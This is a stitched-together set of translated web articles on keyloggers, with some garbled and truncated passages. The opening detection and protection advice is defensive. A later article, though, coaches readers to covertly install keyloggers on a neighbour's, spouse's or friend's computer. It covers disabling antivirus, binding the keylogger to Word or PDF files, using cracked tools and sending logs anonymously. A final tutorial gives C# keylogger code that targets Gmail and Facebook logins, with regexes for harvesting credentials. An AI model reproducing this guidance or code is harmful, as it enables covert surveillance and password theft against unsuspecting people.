How to look for keyloggers

No matter how cunning keyloggers are, they can still be detected. There are several ways.

• Search by signatures

This method allows you to accurately determine the presence of keyloggers, right choice signatures can reduce the probability of error to zero. But a signature scanner is capable of detecting objects that are already known and described in its database, so this requires that the database be large and constantly updated.

• Heuristic algorithms

This method finds a keylogger based on its characteristic features and allows you to detect standard keyboard traps. Studies have shown that hundreds safe programs, which are not keyloggers, set traps to track mouse and keyboard input. For example, the well-known Punto Switcher program, software for multimedia keyboards and mice.

• Monitoring API functions used by spies

The method is based on intercepting a number of functions used by keyloggers, such as SetWindowsHookEx, UnhookWindowsHookEx, GetAsyncKeyState, GetKeyboardState.

Tracking drivers, processes, services used by the system

The method is suitable not only for tracking keyloggers. The simplest use case is to use a program like Kaspersky Inspector, which monitors the appearance of new files in the system.

How to protect yourself from keyloggers

Often, known keyloggers have already been added to the database, and therefore the protection method is the same as against any malicious software:

• Installing an antivirus product;
• Maintaining an up-to-date database.

It is worth noting that most antivirus programs classify keyloggers as potentially dangerous software, and here it is necessary to clarify that in the default settings the antivirus product detects the presence of this type of program. If not, then you should make the settings manually to protect yourself from most common spyware.

In general, since keyloggers are aimed at spying on confidential data, you should resort to in the following ways security:

Use of one-time passwords/two-factor authentication

Using proactive defense systems, which allows you to warn the user about the installation/activation of keylogger programs

Usage virtual keyboard , which represents the keyboard on the screen as an image, allows you to protect yourself from both software and hardware spies.

Finding and removing keyloggers

What are the ways to protect yourself from this evil spirit?

• Any antivirus program
• Utilities with signature and heuristic search mechanisms (for example, AVZ).
• Utilities and programs aimed at detecting keyloggers and blocking their work. This method of protection is the most effective, since this software, as a rule, blocks almost all types of keyloggers.

It is worth noting that software aimed at catching keyloggers has two features: software of this kind is mostly paid and the Russian language is rarely present.

For example, the English-language free software Advanced Spyware Remover eliminates advertising programs, dialers, spyware, keyloggers, etc.

The installation is standard, you should click “Next”, it’s difficult to make a mistake. After installation, you are prompted to run the program. To scan, click “Scan Now”.

However, it is worth noting that the program has not been updated for 3 years.

In general, this program checks the system registry for the presence of keys in it malware. The utility has some functionality, thereby allowing you to display a list of loaded programs at startup operating system(“HiJack Scan→Startup“), display a list of services, show active ports, view “cookies” Internet Explorer etc. After scanning, a similar window will appear:

If you pay attention to something fresher, you can use Spyware Terminator 2012 (though not for free). The utility is capable of detecting and removing almost all types of malware. The built-in security system activates application and system protection and monitors utilities that directly interact with the network.

• interception clipboard,
• intercepting keystrokes,
• intercepting text from windows

and much more. Anti-keylogger does not use signature databases, as it is based only on heuristic algorithms. Anti-keylogger is able to protect against targeted attacks, which are very dangerous and popular among cybercriminals. It is especially effective in the fight against keyloggers based on the use of traps, cyclic polling and a keyboard filter driver.

Anti-keylogger has a free option, limited by time of use - 10 working sessions, each lasting 2 hours, which is quite enough to check your PC at a time.

So, what do we have:

1. Keyloggers are marketed as legitimate software, but many of them can be used to steal users' personal information.
2. Today, keyloggers, along with phishing, etc., have become one of the main methods of electronic fraud.
3. There has been an increase in the number of malware with keylogger functionality.
4. Distribution of software keyloggers based on rootkit technologies, which makes them invisible to the user and anti-virus scanners.
5. Detecting espionage using keyloggers requires the use of specialized security tools.
6. The need for multi-level protection (anti-virus products with the function of detecting dangerous software, proactive protection tools, virtual keyboard).

Leave your comment!

Various spyware are necessary in conditions where many people have access to one computer.

In these circumstances, the user may want to know which sites were visited from his computer (for example, by children), whether credit cards were stolen using saved passwords, etc. To clarify these issues, it will be necessary.

Our review will allow you to make the best choice.

Features of choice

What exactly is a keylogger? This is a program that, strictly speaking, is not directly related to the keyboard.

It is installed in the computer's memory and acts on. Often, signs of its activity are not visible on the computer unless you specifically look for them.

Such a program interacts indirectly with the keyboard, that is, it works with a program on the PC that converts the signals received by the processor as a result of pressing buttons into text when printing.

That is, the action of such software is aimed at collecting information entered through the keyboard.

There are such utilities different types– with the help of some you can view all the text typed from the keyboard, with others – only what was typed in the browser or in any selected application.

Some programs provide the ability to configure such indicators, others do not.

They also differ from each other in the degree of secrecy. For example, the activity of some is obvious, a shortcut remains on the Desktop, etc., such programs are suitable for monitoring the activities of, for example, children.

Traces of the presence and activity of others are not noticeable at all - they act hidden and are suitable for installation on someone else’s computer, when the fact of installation needs to be hidden from a third-party user.

Given such diversity, choosing the most suitable software can be quite difficult.

IN this material TOP presented best programs, which can be used for this purpose. It is easier to choose the right one among them.

Specifications

To simplify the software selection process, the table below shows the main comparative characteristics of all programs included in the TOP.

Name	License type	Type of information collected	Functional	Design
SC-KeyLog	For free	All	Wide	Simplified
WideStep Handy Keylogger	Free/Paid	All	Wide	Improved
Actual Spy	Paid	All	Very wide	Standard
EliteKeylogger	Paid	All	Wide	Standard
The Rat!	Free/Paid	Less than previous	Quite wide	Unaesthetic
SPYGO	For free	Depending on version	Depending on version	Standard Windows appearance
Ardamax Keylogger 2.9	For free	From the keyboard	Narrowed	Simplified
NS Keylogger Personal Monitor 3.8	For free	All	Narrowed	Simplified
KGB Spy	Paid	From the keyboard + open programs	Narrow	Simple
Golden Keylogger 1.32	For free	From the keyboard	Very narrow	Simple

Based on the characteristics from this table, it is easy to choose the program that best suits your specific requirements.

These utilities are described in more detail below.

SC-KeyLog

This is a voluminous and functional spy program that is distributed free of charge.

In addition to specifically tracking information entered from the keyboard, it is also able to collect addresses of visited sites, passwords, open windows in the browser.

Gives full information about all actions performed on the computer. In this case, the generated file can be viewed remotely from another device.

• Opportunity remote access to a file from another device;
• No traces of program activity on the computer with the correct settings;
• Variety of collected data – information about almost all actions on the PC can be accessed.

• Saves passwords only up to NT0;
• Too simple menu and unaesthetic design;
• A rather inconvenient format for displaying the result.

What do users who actively use this software say? “Absolutely invisible to the user”, “Data arrives regularly by email.”

WideStep Handy Keylogger

This application is distributed free of charge. The full paid version costs $35.

Quite an interesting and functional program that is worth the money if you are willing to pay it.

Distinctive feature– the ability to send recorded data at a specified frequency. Otherwise it works fine, often more stable than other programs on this list.

• Collection of various types of information;
• Complete invisibility of work on the user’s computer;
• Simple interface and controls.

• The design is better than the previous program, but still not great;
• The result display format is inconvenient;
• The paid version is quite expensive.

Users' opinions about this software are as follows: “Convenient, simple and functional program. Quite invisible when working.”

Actual Spy

It is functional and sophisticated paid program costing 600 rubles. However, it has a demo version that is free.

Feature of this software– ability in a given period of time.

This helps solve the problem of entering a graphic password/key, which Lately began to spread widely.

• Many types of information collected plus the ability to take screenshots from the screen during a specified period;
• A large number of others additional functions and features;
• Records not only actions, but also the time they were performed;
• Encrypts the generated log.

• The duration of work (collection of information) in the free demo version is 40 minutes;
• Paid distribution, although a more or less reasonable price;
• The weight of the program is quite large.

User reviews about this application are: “The program is excellent. Well done programmers!”

EliteKeylogger

Paid program with enough at a high price – 69 dollars. It operates completely undetectably on a PC in low-level mode, making it almost completely undetectable.

Interesting and convenient feature– automatic launch of software, occurring simultaneously with the launch of the system itself.

It is difficult to detect or not detected at all even by special anti-keyloggers.

• Completely hidden action and difficult to detect;
• Low-level driver-type operating format and automatic startup when the system boots;
• It also tracks the presses of not only the main, but also the service keys on the keyboard.

• A rather complex system for installing the program on a PC;
• The program is expensive, but you can find an old hacked version on the Russian Internet;
• A rather complex system of individual program settings, which, however, justifies itself.

What do users say about this software? “Good program”, “A little short of Jetlogger.”

The Rat!

Quite a common and popular, functional utility with a paid license.

However, for private use, a free demo version is provided for a limited period.

The program is very simple– any advanced user can write the same. However, it is completely undetectable by antiviruses and special programs, detecting such software.

• Simplicity, functionality and high stability;
• Minimum file weight and space occupied by it on the computer;
• Quite a lot of settings.

• A rather unpleasant design, made in black, white and red;
• The functionality is somewhat narrower than in the programs described before;
• Inconvenient viewing of the log and generally inconvenient interface and use.

Users say the following about this program: “It works stably, but is a bit simple,” “The program is good, it allows you to collect data unnoticed.”

SPYGO

This is a fundamentally new keylogger, designed to work on and developed by a Russian programmer.

Keylogger is a program that reads the keys pressed and saves them to a file. In the future, you can view what the person wrote at the computer, what messages he typed and what passwords he entered. Another name for a keylogger is a keylogger, from the English “keylogger,” which literally means “recording buttons.”

In the NeoSpy program, the keylogger function is enabled by default; in this mode, the program records text, hotkey combinations and passwords typed on the keyboard. Managing keylogger settings is located in the menu "Tracking Settings" - "Log Recording" - "Keyboard". You can choose one of two operating modes of the program: standard and alternative. It is recommended to use the standard option in 99% of cases, but in case of a conflict with your antivirus software you can enable alt mode.

Setting up a keylogger

The keyboard log is always recorded in full format, including service keys. An example of such a log can be seen in the illustration. While viewing the report, you can turn off the display non-printing characters and view the log as simple text, more accessible for free reading.

Keylogger example

To make working with reports easier, typed passwords are highlighted in the list of keystrokes. This way you can find out your child’s passwords and, if necessary, protect him from unwanted acquaintances. If the NeoSpy program is used at an enterprise to monitor employees, then the collection of personal data and correspondence is prohibited by the legislation of most countries, so this option must be disabled, or the employee must be notified in writing about control by management and the inadmissibility of using a computer in the organization for personal correspondence.

Who among us hasn’t wanted to feel like a cool hacker at least once and break at least something? :) Even if not, then let’s talk about how great it would be to get a password from your mail/social network. the network of a friend, wife/husband, roommate thought at least once by everyone. :) Yes, and you have to start somewhere, after all! A significant part of attacks (hacking) involves infecting the victim’s computer with so-called keyloggers (spyware).

So, in today’s article we’ll talk about what are free programs to monitor computers on windows based , where you can download their full versions, how to infect a victim’s computer with them, and what are the features of their use.

But first, a little introduction.

What are keyloggers and why are they needed?

I think you yourself have guessed what it is. As a rule, they are a kind of program that is hidden (although this is not always the case) installed on the victim’s computer, after which it records absolutely all keystrokes on this node. Moreover, in addition to the clicks themselves, the following is usually recorded: the date and time of the click (action) and the program in which these actions were performed (browser, including the website address (hurray, we immediately see what the passwords are for!); local application; system services (including Windows login passwords), etc.).

From here one of the problems is immediately visible: I got access to my neighbor’s computer for a couple of minutes and I want to get her password from VK! I installed the miracle program and returned the computer. How can I look up passwords later? Looking for a way to take the computer from her again? The good news is: usually not. Most keyloggers are capable of not only storing the entire accumulated database of actions locally, but also sending it remotely. There are many options for sending logs:

• A fixed e-mail (there may be several) is the most convenient option;
• FTP server (who has it);
• SMB server (exotic, and not very convenient).
• A fixed flash drive (you insert it into the USB port of the victim’s computer, and all logs are copied there automatically in invisible mode!).

Why is all this needed? I think the answer is obvious. In addition to the banal stealing of passwords, some keyloggers can do a number of other nice things:

• Logging correspondence in specified social networks. networks or instant messengers (for example, Skype).
• Taking screenshots of the screen.
• View/capture webcam data (which can be very interesting).

How to use keyloggers?

And this is a difficult question. You need to understand that just finding a convenient, functional, good keylogger is not enough.

So, what is needed for a spy program to work successfully?:

• Administrator access to a remote computer.
  Moreover, this does not necessarily mean physical access. You can easily access it via RDP (Remote Desktop Service); TeamViewer; AmmyAdmin, etc.
  As a rule, the greatest difficulties are associated with this point. However, I recently wrote an article about how to get administrator rights in Windows.
• Anonymous e-mail / ftp (by which you will not be identified).
  Of course, if you are breaking Aunt Shura for your neighbor, this point can be safely omitted. As is the case if you always have the victim’s computer at hand (ala, find out your brother/sister’s passwords).
• Lack of working antiviruses / internal systems Windows protection.
  Most public keyloggers (which will be discussed below) are known to the vast majority of antivirus software (although there are logger viruses that are built into the OS kernel or system driver, and antiviruses can no longer detect or destroy them, even if they have detected them). Due to the above, anti-virus software, if any, will have to be mercilessly destroyed. In addition to antiviruses, systems like Windows Defender(these first appeared in Windows 7 onwards). They detect suspicious activity in software running on a computer. You can easily find information on how to get rid of them on Google.

These, perhaps, are all the necessary and sufficient conditions for your success in the field of stealing other people’s passwords / correspondence / photos or whatever else you want to encroach on.

What types of spyware are there and where can I download them?

So, let's begin the review of the main keyloggers that I used in my daily practice with links to download them for free full versions(i.e. all versions are the latest at the moment (for which it is possible to find a cure) and with already working and tested cracks).

0. The Rat!

Ratings (out of 10):

• Stealth: 10
• Convenience/usability: 9
• Functionality: 8

It's just a bomb, not a keylogger! In working condition it takes 15-20 KB. Why be surprised: it is written entirely in assembly language (veteran programmers shed tears) and written mostly by enthusiastic hackers, due to which the level of its secrecy is simply amazing: it works at the OS kernel level!

In addition, the package includes FileConnector - a mini-program that allows you to connect this keylogger with absolutely any program. As a result, you get a new exe of almost the same size, and when launched, it works exactly like the program with which you glued it together! But after the first launch, your keylogger will be automatically installed in invisible mode with the parameters for sending logs that you have previously specified. Convenient, isn't it?

Great opportunity for social engineering(bring a game file/presentation to a friend on a flash drive, or even just a Word document (I’ll tell you how to create an exe file that launches a specific word/excel file in one of my next articles), launch it, everything is good and wonderful, however, the friend is already invisibly infected!). Or you simply send this file to a friend by mail (preferably a link to download it, since modern mail servers prohibit sending exe files). Of course, there is still a risk from antiviruses during installation (but it will not exist after installation).

By the way, using some other techniques you can glue any distribution together hidden installation(these are available in The Rat! and Elite keylogger) not only with exe files (which still raise suspicion among more or less advanced users), but also with ordinary word / excel and even pdf files! No one will ever think anything about a simple pdf, but that’s not the case! :) How this is done is the topic of a whole separate article. Those who are especially zealous can write me questions through the feedback form. ;)

Overall, The Rat! can be described for a very long time and a lot. This was done much better than me. There is also a download link there.

1. Elite keylogger

Ratings (out of 10):

• Stealth: 10
• Convenience/usability: 9
• Functionality: 8

Perhaps one of the best keyloggers ever created. Its capabilities, in addition to the standard set (interception of all clicks in the context of applications / windows / sites), include interception of instant messenger messages, pictures from a webcam, and also - which is VERY important! - interception of WinLogon service passwords. In other words, it intercepts Windows login passwords (including domain ones!). This became possible thanks to its work at the system driver level and launch even at the OS boot stage. Due to this same feature, this program remains completely invisible to both Kasperosky and all other anti-malware software. Frankly, I have not met a single keylogger capable of this.

However, you shouldn’t delude yourself too much. The installer itself is recognized by antiviruses very easily and to install it you will need administrator rights and disabling all antivirus services. After installation, everything will work perfectly in any case.

In addition, the described feature (working at the OS kernel level) introduces requirements for the OS version on which the keyloggers will work. Version 5-5.3 (links to which are given below) supports everything up to and including Windows 7. Win 8/10 as well windows family server (2003 / 2008 / 2012) are no longer supported. There is version 6, which functions perfectly, incl. on win 8 and 10, however, it is currently not possible to find a cracked version. It will probably appear in the future. In the meantime, you can download Elite keylogger 5.3 from the link above.

There is no network operation mode, therefore it is not suitable for use by employers (to monitor the computers of their employees) or an entire group of people.

An important point is the ability to create an installation distribution with predefined settings (for example, with a specified email address where logs will need to be sent). At the same time, at the end you get a distribution kit that, when launched, does not display absolutely any warnings or windows, and after installation it can even destroy itself (if you check the appropriate option).

Several screenshots of version 5 (to show how beautiful and convenient everything is):

2. All-in-one keylogger.

Ratings (out of 10):

• Stealth: 3
• Convenience/usability: 9
• Functionality: 8

It is also a very, very convenient thing. The functionality is quite at the level of Elite keylogger. Things are worse with secrecy. Winlogon passwords are no longer intercepted, it is not a driver, and is not built into the kernel. However, it is installed in system and hidden AppData directories, which are not so easy to reach to unauthorized users(not to those on whose behalf it was installed). Nevertheless, antiviruses sooner or later successfully do this, which makes this thing not particularly reliable and safe when used, for example, at work to spy on your own superiors. ;) Gluing it to something or encrypting the code to hide it from antiviruses will not work.

Works on any version of Win OS (which is nice and practical).

As for the rest, everything is fine: it logs everything (except Windows login passwords), sends it anywhere (including e-mail, ftp, fixed flash drive). In terms of convenience, everything is also excellent.

3. Spytech SpyAgent.

Ratings (out of 10):

• Stealth: 4
• Convenience/usability: 8
• Functionality: 10

Also a good keylogger, although with dubious secrecy. Supported OS versions are also all possible. The functionality is similar to previous options. There is an interesting self-destruct function after a specified period of time (or upon reaching a predetermined date).

In addition, it is possible to record video from a webcam and sound from a microphone, which can also be very popular and which the previous two representatives do not have.

There is a network mode of operation, which is convenient for monitoring an entire network of computers. By the way, StaffCop has it (it is not included in the review due to its uselessness for one user - an individual). Perhaps this program is ideal for employers to spy on their employees (although the leaders in this field are unconditionally StaffCop and LanAgent - if you are a legal entity, be sure to look in their direction). Or to keep track of your offspring who love to sit and watch “adult sites”. Those. where what is needed is not concealment, but convenience (including a bunch of beautiful log reports, etc.) and functionality for blocking specified sites/programs (SpyAgent also has it).

4. Spyrix Personal monitor.

Ratings (out of 10):

• Stealth: 4
• Convenience/usability: 6
• Functionality: 10

The functionality is at the level of the previous candidate, but the same problems with secrecy. In addition, the functionality includes an interesting thing: copying files from USB drives inserted into the computer, as well as remote viewing of logs through a web account on the Spyrix website (but we are going to download a cracked version, so it will not work for us).

5. Spyrix Personal monitor.

Ratings (out of 10):

• Stealth: 3
• Convenience/usability: 6
• Functionality: 8

I won’t describe it in detail, because... this copy does not have anything that one of the previous spies did not have, however, someone may like this keylogger (at least for its interface).

What do we end up with?

The issue of using a keylogger is more ethical than technical, and it greatly depends on your goals.

If you are an employer who wants to control his employees, feel free to set up StaffCop, collect written permission from all employees for such actions (otherwise you may be seriously charged for such things) and the job is in the bag. Although I personally know more effective ways increasing the performance of its employees.

If you are a novice IT specialist who just wants to experience what it’s like to break someone - and how this thing works in general, then arm yourself with social engineering methods and conduct tests on your friends, using any of the examples given. However, remember: the detection of such activity by victims does not contribute to friendship and longevity. ;) And you definitely shouldn’t test this at your work. Mark my words: I have experience with this. ;)

If your goal is to spy on your friend, husband, neighbor, or maybe you even do it regularly and for money, think carefully about whether it’s worth it. After all, sooner or later they may attract. And it’s not worth it: “rummaging through someone else’s dirty laundry is not a pleasant pleasure.” If you still need to (or maybe you work in the field of investigating computer crimes and such tasks are part of your professional responsibilities), then there are only two options: The Rat! and Elite Keylogger. In the mode of hidden installation distributions, glued with word / excel / pdf. And it’s better, if possible, encrypted with a fresh cryptor. Only in this case can we guarantee safer activities and real success.

But in any case, it is worth remembering that the competent use of keyloggers is only one small link in achieving the goal (including even a simple attack). You don’t always have admin rights, you don’t always have physical access, and not all users will open, read, and even more so download your attachments/links (hello social engineering), the antivirus won’t always be disabled/your keylogger/cryptor won’t always be unknown to them . All these and many untold problems can be solved, but their solution is the topic of a whole series of separate articles.

In a word, you have just begun to plunge into a complex, dangerous, but insanely interesting world information security. :)

Sincerely,Lysyak A.S.

The hacker world can be divided into three groups of attackers:

1) “Skids” (script kiddies) – little novice hackers who collect well-known pieces of code and utilities and use them to create some simple malware.

2) “Buyers” are unscrupulous entrepreneurs, teenagers and other thrill-seekers. They buy services for writing such software on the Internet, collect various private information with its help, and possibly resell it.

3) “Black Hat Coders” - programming gurus and architecture experts. They write code in a notepad and develop new exploits from scratch.

Can someone with good programming skills become the last one? I don't think you'll start creating something like regin (link) after attending a few DEFCON sessions. On the other hand, I believe that an information security officer should master some of the concepts on which malware is built.

Why do information security personnel need these dubious skills?

Know your enemy. As we discussed on the Inside Out blog, you need to think like the offender to stop him. I am an information security specialist at Varonis and in my experience, you will be stronger in this craft if you understand what moves an attacker will make. So I decided to start a series of posts about the details that go behind malware and the different families of hacking tools. Once you realize how easy it is to create undetectable software, you may want to reconsider your enterprise's security policies. Now in more detail.

For this informal "hacking 101" class, you need some programming knowledge (C# and java) and a basic understanding of Windows architecture. Keep in mind that in reality the malware is written in C/C++/Delphi so as not to depend on frameworks.

Keylogger

A keylogger is software or some kind of physical device that can intercept and remember keystrokes on a compromised machine. This can be thought of as a digital trap for every keystroke on a keyboard.
Often this function is implemented in other, more complex software, for example, Trojans (Remote Access Trojans RATS), which ensure the delivery of intercepted data back to the attacker. There are also hardware keyloggers, but they are less common because... require direct physical access to the machine.

However, creating basic keylogger functions is fairly easy to program. WARNING. If you want to try any of the following, make sure you have the permissions and are not disrupting the existing environment, and it's best to do it all on an isolated VM. Further, this code won't be optimized, I'll just show you lines of code that can accomplish the task, it's not the most elegant or optimal way. And finally, I will not tell you how to make a keylogger resistant to reboots or try to make it completely undetectable using special programming techniques, as well as protection from deletion even if it is detected.

To connect to the keyboard you just need to use 2 lines in C#:

1. 2. 3. public static extern int GetAsyncKeyState(Int32 i);

You can learn more about the GetAsyncKeyState function on MSDN:

To understand: this function determines whether a key was pressed or released at the time of the call and whether it was pressed after the previous call. Now we constantly call this function to receive data from the keyboard:

1. while (true) 2. ( 3. Thread.Sleep(100); 4. for (Int32 i = 0; i< 255; i++) 5. { 6. int state = GetAsyncKeyState(i); 7. if (state == 1 || state == -32767) 8. { 9. Console.WriteLine((Keys)i); 10. 11. } 12. } 13. }

What's going on here? This loop will poll each key every 100ms to determine its state. If one of them is pressed (or has been pressed), a message about this will be displayed on the console. In real life, this data is buffered and sent to the attacker.

Smart keylogger

Wait, is there any point in trying to remove all the information from all applications?
The code above pulls raw keyboard input from whatever window and input field currently has focus. If your goal is credit card numbers and passwords, then this approach is not very effective. For real-world scenarios, when such keyloggers are executed on hundreds or thousands of machines, subsequent data parsing can become very long and ultimately meaningless, because Information valuable to an attacker may be out of date by then.

Let's assume that I want to get my hands on Facebook or Gmail credentials to sell likes. Then new idea– activate keylogging only when the browser window is active and the word Gmail or facebook is in the page title. By using this method I increase the chances of obtaining credentials.

Second version of the code:

1. while (true) 2. ( 3. IntPtr handle = GetForegroundWindow(); 4. if (GetWindowText(handle, buff, chars) > 0) 5. ( 6. string line = buff.ToString(); 7. if (line.Contains("Gmail")|| line.Contains("Facebook - Log In or Sign Up")) 8. ( 9. //keyboard check 10. ) 11. ) 12. Thread.Sleep(100); 13. )

This snippet will detect the active window every 100ms. This is done using the GetForegroundWindow function (more information on MSDN). The page title is stored in the buff variable, if it contains gmail or facebook, then the keyboard scanning fragment is called.

By doing this, we ensured that the keyboard is scanned only when the browser window is open on the facebook and gmail sites.

An even smarter keylogger

Let's assume that the attacker was able to obtain the data using a code similar to ours. Let’s also assume that he is ambitious enough to infect tens or hundreds of thousands of machines. Result: a huge file with gigabytes of text in which the necessary information still needs to be found. It's time to get acquainted with regular expressions or regex. This is something like a mini language for creating certain templates and scanning text for compliance with given templates. You can find out more here.

To simplify, I will immediately give ready-made expressions that correspond to login names and passwords:

1. //Looking for postal address 2. ^[\w!#$%&"*+\-/=?\^_`(|)~]+(\.[\w!#$%&"*+ \-/=?\^_`(|)~]+)*@((([\-\w]+\.)+(2,4))|(((1,3)\.)( 3)(1,3)))$ 3. 4. 5. //Looking for password 6. (?=^.(6,)$)(?=.*\d)(?=.*)

These expressions are here as a hint to what can be done using them. Using regular expressions, you can search (and find!) any constructions that have a specific and unchanging format, for example, passport numbers, credit cards, Accounts and even passwords.
Really, regular expressions not the most readable type of code, but they are one of the programmer’s best friends if there are text parsing tasks. Java, C#, JavaScript and other popular languages ​​already have ready-made functions into which you can pass regular regular expressions.

For C# it looks like this:

1. Regex re = new Regex(@"^[\w!#$%&"*+\-/=?\^_`(|)~]+(\.[\w!#$%&"* +\-/=?\^_`(|)~]+)*@((([\-\w]+\.)+(2,4))|(((1,3)\.) (3)(1,3)))$"); 2. Regex re2 = new Regex(@"(?=^.(6,)$)(?=.*\d)(?=.*)"); 3. string email = " [email protected]"; 4. string pass = "abcde3FG"; 5. Match result = re.Match(email); 6. Match result2 = re2.Match(pass);

Where the first expression (re) will match any e-mail, and the second (re2) is any alphanumeric structure greater than 6 characters.

Free and completely undetectable

In my example, I used Visual Studio - you can use your favorite environment - to create such a keylogger in 30 minutes.
If I were a real attacker, then I would aim at some real target (banking sites, social networks, etc.) and modify the code to match these goals. Of course, also, I would launch a phishing campaign with by email with our program, under the guise of a regular account or other investment.

One question remains: will such software really be undetectable by security programs?

I compiled my code and checked the exe file on the Virustotal website. This is a web tool that calculates the hash of the file you have uploaded and looks it up in the database known viruses. Surprise! Naturally nothing was found.

This is the main point! You can always change the code and develop, always being a few steps ahead of the threat scanners. If you are able to write your own code it is almost guaranteed to be undetectable. You can read the full analysis on this page.

The main purpose of this article is to show that using antiviruses alone you will not be able to fully ensure security in your enterprise. A more in-depth assessment of the actions of all users and even services is needed to identify potentially malicious actions.

In the next article I will show how to make a truly undetectable version of such software.